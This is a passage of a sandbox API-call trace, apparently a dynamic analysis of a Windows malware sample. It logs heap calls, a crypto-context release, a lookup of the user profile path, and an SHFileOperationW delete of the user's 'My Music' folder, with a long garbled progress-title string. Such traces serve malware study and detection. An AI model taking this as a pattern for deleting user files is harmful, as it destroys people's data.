wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0218.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0218.088] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0218.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.089] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.089] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.089] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.089] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.089] FreeLibrary (hLibModule=0x76390000) returned 1 [0218.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.089] CloseHandle (hObject=0x50c) returned 1 [0218.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.089] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.089] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.089] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854920 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0218.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0218.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d7a0 [0218.091] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Music", lpFilePart=0x8cedf4*="My Music") returned 0x22 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7a0 | out: hHeap=0x2af0000) returned 1 [0218.091] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music" (normalized: "c:\\users\\fd1hvy\\documents\\my music")) returned 0x2416 [0218.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x1d, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.091] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0218.091] GetLastError () returned 0x6 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854920 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.092] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0218.092] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0218.092] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0218.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0218.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854c68 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0218.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d700 [0218.094] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Music", lpFilePart=0x8cf650*="My Music") returned 0x22 [0218.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d700 | out: hHeap=0x2af0000) returned 1 [0218.094] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music" (normalized: "c:\\users\\fd1hvy\\documents\\my music")) returned 0x2416 [0218.094] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸